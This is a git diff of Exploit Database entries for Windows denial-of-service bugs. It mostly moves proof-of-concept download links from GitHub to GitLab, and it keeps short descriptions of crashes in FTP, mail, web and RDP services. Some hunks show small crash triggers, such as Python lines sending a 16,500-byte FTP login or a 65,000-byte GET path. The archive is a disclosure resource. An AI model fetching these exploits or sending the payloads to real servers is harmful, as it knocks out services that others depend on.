-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19483.jls +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19483.jls Affected Products diff --git a/exploits/windows/dos/19578.txt b/exploits/windows/dos/19578.txt index 24f54341b..243b06472 100644 --- a/exploits/windows/dos/19578.txt +++ b/exploits/windows/dos/19578.txt @@ -6,4 +6,4 @@ The problem lies within the manner that srvsvc.dll makes calls to services.exe. If this denial of service is combined with a number of other exploits, it may be possible to have this attack spawn a Debugger (ie Dr Watson) call on the host, which, if trojaned, may execute malicious code on the target host. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19578.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19578.zip \ No newline at end of file diff --git a/exploits/windows/dos/19619.txt b/exploits/windows/dos/19619.txt index 10e7bed5b..f741f6bee 100644 --- a/exploits/windows/dos/19619.txt +++ b/exploits/windows/dos/19619.txt @@ -5,6 +5,6 @@ The FTP server that ships with QPC's QVT line of products is vulnerable to a den 19619-2.exe - binary 19619-1.zip - source -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19619-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19619-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19619-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19619-2.exe \ No newline at end of file diff --git a/exploits/windows/dos/19624.txt b/exploits/windows/dos/19624.txt index a77986c31..1d5cd2bff 100644 --- a/exploits/windows/dos/19624.txt +++ b/exploits/windows/dos/19624.txt @@ -5,6 +5,6 @@ The G6 FTP Server, by Gene6, is vulnerable to a buffer overflow attack. If 2000 Source - 19624-1.zip Binary - 19624-2.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19624-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19624-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19624-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19624-2.exe \ No newline at end of file diff --git a/exploits/windows/dos/19636.txt b/exploits/windows/dos/19636.txt index 328c3e691..8c956c8b6 100644 --- a/exploits/windows/dos/19636.txt +++ b/exploits/windows/dos/19636.txt @@ -6,8 +6,8 @@ The ZetaMail mail server will crash if a username/password pair longer than 3500 19636-2.zip - source for windows 19636-3.tgz - source for linux -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19636-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19636-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19636-2.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19636-2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19636-3.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19636-3.tgz \ No newline at end of file diff --git a/exploits/windows/dos/19639.txt b/exploits/windows/dos/19639.txt index b52eda3ff..cfa4536da 100644 --- a/exploits/windows/dos/19639.txt +++ b/exploits/windows/dos/19639.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/820/info The Mdaemon mail server for Windows includes a small web server for web-based remote administration. This webserver is vulnerable due to an unchecked buffer that handles incoming GET requests. An abnormally large URL sent to the WebConfig service at port 2002 will crash the service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19639-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19639-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19639-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19639-2.exe \ No newline at end of file diff --git a/exploits/windows/dos/19664.txt b/exploits/windows/dos/19664.txt index 218aa14a6..0f55dc1a1 100644 --- a/exploits/windows/dos/19664.txt +++ b/exploits/windows/dos/19664.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/859/info If the Serv-U FTP server receives an overly long argument to the SITE PASS command, it will crash. To issue this command, an attacker must be already logged in as an authenticated user, including an 'anonymous' user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19664.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19664.zip \ No newline at end of file diff --git a/exploits/windows/dos/19711.txt b/exploits/windows/dos/19711.txt index 0b0ef2b09..a343b0544 100644 --- a/exploits/windows/dos/19711.txt +++ b/exploits/windows/dos/19711.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/914/info IMail includes a service called IMail Monitor which is used for local and remote performance measuring and diagnostics. It includes a small webserver operating on port 8181 to support web-based monitoring. One of the cgi scripts, status.cgi, is used to determine which services are currently running and create a web pafge to report this information. Multiple simultaneous requests for status.cgi will cause the software to crash, with a Dr. Watson error of "Invalid Memory Address". -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19711-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19711-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19711-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19711-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19725.txt b/exploits/windows/dos/19725.txt index ab6ca7027..bad1d3812 100644 --- a/exploits/windows/dos/19725.txt +++ b/exploits/windows/dos/19725.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/930/info There is a denial of service condition in Nosque Workshop's MsgCore SMTP server. The problem lies in memory used to store server input not being deallocated and eventually exhausted, causing the target NT host to freeze requiring a reboot. If a smtp client (or user sending input manually) sends multiple sequences of "HELO/ MAIL FROM/ RCPT TO / DATA" in a single connection, the memory allocated to store all of those values will not be freed and the target will stop functioning once memory runs out. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19725.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19725.zip \ No newline at end of file diff --git a/exploits/windows/dos/19755.txt b/exploits/windows/dos/19755.txt index 2a9da321b..34e8ddb70 100644 --- a/exploits/windows/dos/19755.txt +++ b/exploits/windows/dos/19755.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/995/info The Pragma Systems InterAccess TelnetID Server 4.0 (Build 4) has an unchecked buffer in the code that handles login commands. Arbitrary code is capable of being executed on the InterAccess TelnetD Server if a string of over 300 characters is used as a login name. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19755-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19755-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19755-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19755-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19760.txt b/exploits/windows/dos/19760.txt index cfb16055b..8c838d4c1 100644 --- a/exploits/windows/dos/19760.txt +++ b/exploits/windows/dos/19760.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/1001/info The Pragma Systems InterAccess TelnetID Server 4.0 can be crashed by sending invalid, unexpected characters in the client's terminal configuration settings. This causes telnetd.exe to GPF, and will cause the server to stop responding. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19760-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19760-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19760-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19760-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19807.txt b/exploits/windows/dos/19807.txt index 2da1018b1..509c3429b 100644 --- a/exploits/windows/dos/19807.txt +++ b/exploits/windows/dos/19807.txt @@ -2,8 +2,8 @@ source: https://www.securityfocus.com/bid/1051/info Atrium Software Mercur is a SMTP, POP3, and IMAP mail server. Insufficient boundary checking exists in the code that handles within the SMTP "mail from" command, the POP3 "user" command and the IMAP "login" command. The application will crash if an overly long string is used as an argument to any of these commands. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19807-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19807-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19807-2.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19807-2.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19807-3.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19807-3.zip \ No newline at end of file diff --git a/exploits/windows/dos/19810.txt b/exploits/windows/dos/19810.txt index 659e914c2..a896a25d3 100644 --- a/exploits/windows/dos/19810.txt +++ b/exploits/windows/dos/19810.txt @@ -7,6 +7,6 @@ Insufficient boundary checking exists in the code which handles GET requests, sp eg. http: //target/&mail_user= -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19810-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19810-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19810-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19810-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19827.txt b/exploits/windows/dos/19827.txt index 8ab4504e4..a0cc53128 100644 --- a/exploits/windows/dos/19827.txt +++ b/exploits/windows/dos/19827.txt @@ -7,6 +7,6 @@ It relies on port 515 for data transmittal. A malformed print request sent to th The TCP/IP Printing Service is not installed by default on Windows NT or Windows 2000 and this exploit does not affect the printing services native to Windows. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19827-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19827-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19827-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19827-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19856.txt b/exploits/windows/dos/19856.txt index b50a4795d..9c3c2f6fa 100644 --- a/exploits/windows/dos/19856.txt +++ b/exploits/windows/dos/19856.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/1128/info Sending malformed packets to port 7070 will cause Real Server to stop responding. Restarting the server will be required in order to re-establish normal functionality. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19856-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19856-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19856-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19856-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19907.txt b/exploits/windows/dos/19907.txt index b9a126ec8..a646cf861 100644 --- a/exploits/windows/dos/19907.txt +++ b/exploits/windows/dos/19907.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/1190/info Sending a specially crafted URL containing malformed file extension information to Microsoft IIS 4.0/5.0 will consume CPU usage until it reaches 100% which will halt the program's services. Restarting the application or waiting until the URL is processed will be required in order to regain normal functionality. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19907-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19907-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19907.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19907.zip \ No newline at end of file diff --git a/exploits/windows/dos/19960.txt b/exploits/windows/dos/19960.txt index f809aa813..746a84faf 100644 --- a/exploits/windows/dos/19960.txt +++ b/exploits/windows/dos/19960.txt @@ -54,4 +54,4 @@ to cause a heap-based buffer overflow via a specially crafted file. ============= http://www.protekresearchlab.com/exploits/PRL-2012-26.fpx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19960.fpx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19960.fpx \ No newline at end of file diff --git a/exploits/windows/dos/19961.txt b/exploits/windows/dos/19961.txt index ff7074137..1a769afba 100644 --- a/exploits/windows/dos/19961.txt +++ b/exploits/windows/dos/19961.txt @@ -54,4 +54,4 @@ exploited to cause a stack-based buffer overflow via a specially crafted file. ============= http://www.protekresearchlab.com/exploits/PRL-2012-25.lwp -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19961.lwp \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19961.lwp \ No newline at end of file diff --git a/exploits/windows/dos/19962.txt b/exploits/windows/dos/19962.txt index c7ac3a019..36d3409bb 100644 --- a/exploits/windows/dos/19962.txt +++ b/exploits/windows/dos/19962.txt @@ -55,4 +55,4 @@ crafted JPEG2000 (JP2) file. ============= http://www.protekresearchlab.com/exploits/PRL-2012-24.jp2 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19962.jp2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19962.jp2 \ No newline at end of file diff --git a/exploits/windows/dos/20016.py b/exploits/windows/dos/20016.py index d3b6c54f7..ca1fe817f 100755 --- a/exploits/windows/dos/20016.py +++ b/exploits/windows/dos/20016.py @@ -25,4 +25,4 @@ from ftplib import FTP ftp = FTP('xxx.xxx.xxx.xxx') # Replace x's with ip ftp.login('A' * 16500) -ftp.quit() +ftp.quit() \ No newline at end of file diff --git a/exploits/windows/dos/20017.py b/exploits/windows/dos/20017.py index aeb2b81b1..ed9ec0db6 100755 --- a/exploits/windows/dos/20017.py +++ b/exploits/windows/dos/20017.py @@ -19,4 +19,4 @@ import httplib h = httplib.HTTP('xxx.xxx.xxx.xxx') #replace x's with ip h.putrequest('GET', 'A' * 65000) -#end +#end \ No newline at end of file diff --git a/exploits/windows/dos/20219.txt b/exploits/windows/dos/20219.txt index b86b43e8e..753de8f28 100644 --- a/exploits/windows/dos/20219.txt +++ b/exploits/windows/dos/20219.txt @@ -4,4 +4,4 @@ If a remote user sends a UDP packet to any port in the 22701 - 22705 range to a As well, sending a UDP packet to port 22703 specifically has been known to cause automatic reboots. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20219.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20219.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/20254.txt b/exploits/windows/dos/20254.txt index ac3ee0d1e..912d04422 100644 --- a/exploits/windows/dos/20254.txt +++ b/exploits/windows/dos/20254.txt @@ -23,4 +23,4 @@ porttool -c \DbgSsApiPort or porttool -c \DbgUiApiPort -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20254.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20254.zip \ No newline at end of file diff --git a/exploits/windows/dos/20255.txt b/exploits/windows/dos/20255.txt index 2d34bbc95..110b9de00 100644 --- a/exploits/windows/dos/20255.txt +++ b/exploits/windows/dos/20255.txt @@ -9,4 +9,4 @@ This vulnerability can only be launched against a machine a user can interactive start porttool -s6 \BaseNamedObjects\Foo porttool -c6 \BaseNamedObject\Foo -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20255.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20255.zip \ No newline at end of file diff --git a/exploits/windows/dos/2039.pl b/exploits/windows/dos/2039.pl index cafe7fc2c..d155a1853 100755 --- a/exploits/windows/dos/2039.pl +++ b/exploits/windows/dos/2039.pl @@ -35,4 +35,4 @@ do } } while (true); -# milw0rm.com [2006-07-20] +# milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/exploits/windows/dos/20783.txt b/exploits/windows/dos/20783.txt index 6dad3cad7..2abf6b77c 100644 --- a/exploits/windows/dos/20783.txt +++ b/exploits/windows/dos/20783.txt @@ -6,4 +6,4 @@ source: https://www.securityfocus.com/bid/2636/info As a result, the user will remain unable to receive new email messages from the affected POP3 account. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20783.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20783.zip \ No newline at end of file diff --git a/exploits/windows/dos/20828.txt b/exploits/windows/dos/20828.txt index 3acceb3ba..e6fdffefc 100644 --- a/exploits/windows/dos/20828.txt +++ b/exploits/windows/dos/20828.txt @@ -6,4 +6,4 @@ A problem in the package could allow remote users to crash the chat server. Upon This problem makes it possible for remote users to crash a Spynet Chat Server, denying service to legimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20828.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20828.zip \ No newline at end of file diff --git a/exploits/windows/dos/20834.txt b/exploits/windows/dos/20834.txt index a737b6018..49b93ddfe 100644 --- a/exploits/windows/dos/20834.txt +++ b/exploits/windows/dos/20834.txt @@ -6,4 +6,4 @@ An attacker can execute a denial of service attack on ElectroComm by submitting This increases CPU utilization to 100%, then crashes the service, which requires a restart. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20834.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20834.zip \ No newline at end of file diff --git a/exploits/windows/dos/20930.c b/exploits/windows/dos/20930.c index 13731fb1d..d5c353d0e 100644 --- a/exploits/windows/dos/20930.c +++ b/exploits/windows/dos/20930.c @@ -76,4 +76,4 @@ int main(int argc, char *argv[]) return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/20946.txt b/exploits/windows/dos/20946.txt index 9d2cf2f7c..b4d3da158 100644 --- a/exploits/windows/dos/20946.txt +++ b/exploits/windows/dos/20946.txt @@ -10,4 +10,4 @@ Due to the fact that the problem stems from a buffer overflow, there is a possib This vulnerability does not require any user authentication to exploit. It may be possible for remote users to cause a denial of service or execute arbitrary code on target hosts. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20946.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20946.exe \ No newline at end of file diff --git a/exploits/windows/dos/20971.txt b/exploits/windows/dos/20971.txt index 3a0006c44..7c7c5a521 100644 --- a/exploits/windows/dos/20971.txt +++ b/exploits/windows/dos/20971.txt @@ -68,4 +68,4 @@ may allow execution of arbitrary code, but requires tricking a user into opening =========== http://www.protekresearchlab.com/exploits/PRL-2012-27.png -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20971.png \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20971.png \ No newline at end of file diff --git a/exploits/windows/dos/21006.txt b/exploits/windows/dos/21006.txt index 6d62f765b..432685b3f 100644 --- a/exploits/windows/dos/21006.txt +++ b/exploits/windows/dos/21006.txt @@ -8,4 +8,4 @@ It is possible to construct an archive with an unusually high compression ratio, When a scanner process unpacks such an archive to examine its contents, the resulting file may be so large that it consumes significant amounts of available disk space. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21006.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21006.zip \ No newline at end of file diff --git a/exploits/windows/dos/21040.txt b/exploits/windows/dos/21040.txt index 1ea0a9774..772eb3823 100644 --- a/exploits/windows/dos/21040.txt +++ b/exploits/windows/dos/21040.txt @@ -6,4 +6,4 @@ The problem occurs when a large number of extraneous ARP packets sent to a host By sending ARP requests to the Ethernet broadcast address, it may be possible to use this attack to disable an entire network. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21040.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21040.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/21047.txt b/exploits/windows/dos/21047.txt index 1768d5997..8dadcf7f7 100644 --- a/exploits/windows/dos/21047.txt +++ b/exploits/windows/dos/21047.txt @@ -8,4 +8,4 @@ In order to exploit NT4ALL, a local user must reportedly have write permissions This is a non-default configuration. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21047.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21047.zip \ No newline at end of file diff --git a/exploits/windows/dos/21123.txt b/exploits/windows/dos/21123.txt index 1b2746acd..a74f35911 100644 --- a/exploits/windows/dos/21123.txt +++ b/exploits/windows/dos/21123.txt @@ -6,4 +6,4 @@ Due to a flaw in the implementation of RDP in Windows 2000/NT Terminal Server, i Sending malformed RDP packets to a host could cause a denial of services, potentially impacting the Terminal service and other applications running on the affected host. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21123.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21123.zip \ No newline at end of file diff --git a/exploits/windows/dos/21171.c b/exploits/windows/dos/21171.c index 908020eea..3b5535b6e 100644 --- a/exploits/windows/dos/21171.c +++ b/exploits/windows/dos/21171.c @@ -492,4 +492,4 @@ int main(int argc, char **argv){ return(1); -} +} \ No newline at end of file diff --git a/exploits/windows/dos/21240.txt b/exploits/windows/dos/21240.txt index a839e7698..39ec50588 100644 --- a/exploits/windows/dos/21240.txt +++ b/exploits/windows/dos/21240.txt @@ -10,4 +10,4 @@ This issue could pose a more serious threat if the XML code associated with 'exp Reportedly, the repair function will not resolve this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21240.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21240.zip \ No newline at end of file diff --git a/exploits/windows/dos/21389.txt b/exploits/windows/dos/21389.txt index fe2a704c0..fee7e6a98 100644 --- a/exploits/windows/dos/21389.txt +++ b/exploits/windows/dos/21389.txt @@ -5,4 +5,4 @@ An issue has been discovered in Windows 2000, which could cause a denial of syst Submitting malformed data to port 445 could cause the Lanman service to consume high CPU and Kernel mode memory usage. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21389.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21389.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/21419.txt b/exploits/windows/dos/21419.txt index d256b94c9..33f74b388 100644 --- a/exploits/windows/dos/21419.txt +++ b/exploits/windows/dos/21419.txt @@ -8,6 +8,6 @@ Under certain circumtances this issue may cause the system to consume CPU time. Varying results have been reported when data is sent directly to a device, such as a denial of service, hardware failure, information disclosure or unauthorized device access. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21419-1.eml +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21419-1.eml -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21419-2.eml \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21419-2.eml \ No newline at end of file diff --git a/exploits/windows/dos/21612.txt b/exploits/windows/dos/21612.txt index 039ffae53..136a33abb 100644 --- a/exploits/windows/dos/21612.txt +++ b/exploits/windows/dos/21612.txt @@ -6,4 +6,4 @@ It has been reported that Popcorn email client will stop responding when attempt Reportedly, a message containing an unusual amount of data or a malformed string of characters in the subject field will initiate a denial of service. This has also been known to occur when the date field of a mail message has the year specified higher than 2037. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21612.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21612.tgz \ No newline at end of file diff --git a/exploits/windows/dos/21645.txt b/exploits/windows/dos/21645.txt index d92e8d796..f1a75a7de 100644 --- a/exploits/windows/dos/21645.txt +++ b/exploits/windows/dos/21645.txt @@ -73,4 +73,4 @@ Short Description: DivideByZero Recommended Bug Title: Integer Divide By Zero starting at FoxitReader_Lib_Full+0x0000000000158c8c (Hash=0x6461647c.0x64616453) ##################################################################### -Proof of concept .pdf included: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21645.pdf \ No newline at end of file +Proof of concept .pdf included: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21645.pdf \ No newline at end of file diff --git a/exploits/windows/dos/21741.txt b/exploits/windows/dos/21741.txt index 27acd4384..490f0900d 100644 --- a/exploits/windows/dos/21741.txt +++ b/exploits/windows/dos/21741.txt @@ -3,7 +3,7 @@ SUMMARY XnView Formats PlugIn is prone to an overflow condition. The JLS Plugin (xjpegls.dll) library fails to properly sanitize user-supplied input resulting in a heap-based buffer overflow. With a specially crafted JLS compressed image file, a context-dependent attacker could potentially execute arbitrary code. POC file posted at: http://www.reactionpenetrationtesting.co.uk/vuln.jls - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21741.jls + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21741.jls CVE number: CVE-2012-4988 Impact: High diff --git a/exploits/windows/dos/21747.txt b/exploits/windows/dos/21747.txt index 04cb3039e..5c5478f0f 100644 --- a/exploits/windows/dos/21747.txt +++ b/exploits/windows/dos/21747.txt @@ -10,4 +10,4 @@ Reportedly, this vulnerability may be exploited both as an authenticated user, a It has been reported, by "Fabio Pietrosanti \(naif\)" , that disabling the NetBIOS Null Session will prevent exploitation of this vulnerablity. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21747.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21747.zip \ No newline at end of file diff --git a/exploits/windows/dos/21789.txt b/exploits/windows/dos/21789.txt index bb47960a8..e138c9064 100644 --- a/exploits/windows/dos/21789.txt +++ b/exploits/windows/dos/21789.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/5682/info Reportedly, when decoding a HTML email, Outlook Express will stop responding upon encountering a link longer than 4095 characters. It is not confirmed why this behaviour occurs. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21789.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21789.zip \ No newline at end of file diff --git a/exploits/windows/dos/21909.txt b/exploits/windows/dos/21909.txt index 48ec58e04..21cd2d0dd 100644 --- a/exploits/windows/dos/21909.txt +++ b/exploits/windows/dos/21909.txt @@ -4,4 +4,4 @@ PowerFTP server is a shareware ftp server available for the Microsoft Windows pl It has been reported that PowerFTP server does not properly handle long user names. When excessive data is supplied as an argument to the FTP 'USER' command, the server becomes unstable. Exploitation of this vulnerability typically results in a crash of the server, requiring a manual restart to resume FTP service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21909.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21909.tgz \ No newline at end of file diff --git a/exploits/windows/dos/21943.c b/exploits/windows/dos/21943.c index a088658ce..69f80a491 100644 --- a/exploits/windows/dos/21943.c +++ b/exploits/windows/dos/21943.c @@ -237,4 +237,4 @@ main(int argc, char *argv[]) }while(childs--) wait(NULL); -} +} \ No newline at end of file diff --git a/exploits/windows/dos/21953.txt b/exploits/windows/dos/21953.txt index 5a01b84d3..bf39e7fed 100644 --- a/exploits/windows/dos/21953.txt +++ b/exploits/windows/dos/21953.txt @@ -8,4 +8,4 @@ It has been reported that installation of the provided patch will cause some pro A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21953.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21953.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/21954.txt b/exploits/windows/dos/21954.txt index 6181cbed5..db1fd2587 100644 --- a/exploits/windows/dos/21954.txt +++ b/exploits/windows/dos/21954.txt @@ -8,4 +8,4 @@ It has been reported that installation of the provided patch will cause some pro A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21954.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21954.rar \ No newline at end of file diff --git a/exploits/windows/dos/22132.txt b/exploits/windows/dos/22132.txt index bc0efe07d..e10c2ae85 100644 --- a/exploits/windows/dos/22132.txt +++ 